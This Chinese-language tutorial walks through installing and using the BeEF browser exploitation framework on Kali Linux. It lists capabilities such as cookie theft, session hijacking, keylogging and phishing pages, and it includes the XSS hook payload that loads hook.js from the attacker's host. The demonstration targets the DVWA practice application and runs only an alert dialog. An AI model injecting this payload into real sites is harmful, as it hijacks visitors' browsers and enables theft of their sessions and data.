*本工具仅供技术分享、交流讨论,严禁用于非法用途。
简介
Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 http://beefproject.com
主要功能
信息收集:
1.网络发现
2.主机信息
3.Cookie获取
4.会话劫持
5.键盘记录
6.插件信息
持久化控制:
1.确认弹框
2.小窗口
3.中间人
社会工程:
1.点击劫持
2.弹窗告警
3.虚假页面
4.钓鱼页面
渗透攻击:
1.内网渗透
2.Metasploit
3.CSRF攻击
4.DDOS攻击
我这里用kali 启动Apache:service apache2 start
然后安装Beef工具
我用脚本安装
命令:
apt-get update
apt-get install beef-xss
apt-get install beef-xss
beef-xss
启动之后
Hook: <script src="http://<IP>:3000/hook.js"></script>
会弹出来beef的登录窗口
这边我们在看一下beef绑定的3000端口
发现绑定3000端口的IP是0.0.0.0
发现是0.0.0.0 监听3000端口
那么远程也是可以访问的
http://192.168.29.131:3000/ui/authentication
查看账号密码(也可进行更改)
找到配置文件(kali默认在/etc/beef-xss/config.yaml中);
cat /etc/beef-xss/config.yaml
BeEF-XSS主页面介绍
启动BeFF-XSS并登陆进去
方式一:在命令行中打beef-xss
方式二:
启动后的界面
Hocked Browers:
online browers 在线浏览器 offline browers 离线浏览器
Detials:浏览器、插件版本信息,操作系统信息
Logs:浏览器动作:焦点变化,鼠标单击,信息输入
*commands:
绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过
payload
这里需要把图中红框中的payload复制粘贴到你的目标xss的位置,然后将其中的<IP>
改成你这台kali的IP地址,最终payload为:
'<script src="http://X.X.X.X:3000/hook.js"></script>'
使用方法
这里我们使用DVWA做实验:
这时候再回到BeEF中查看,会发现online browers中多了点东西
打开"current Browsers" 下的"commands",就可以运行模块对目标系统进行入侵。
例子:选择"Brower"下面的"Hooked Domain"的create Alert Dialog(弹窗 ),点击右下角的"execute"运行
这样我们就能在DVWA上看到弹窗了。
也可以执行其他操作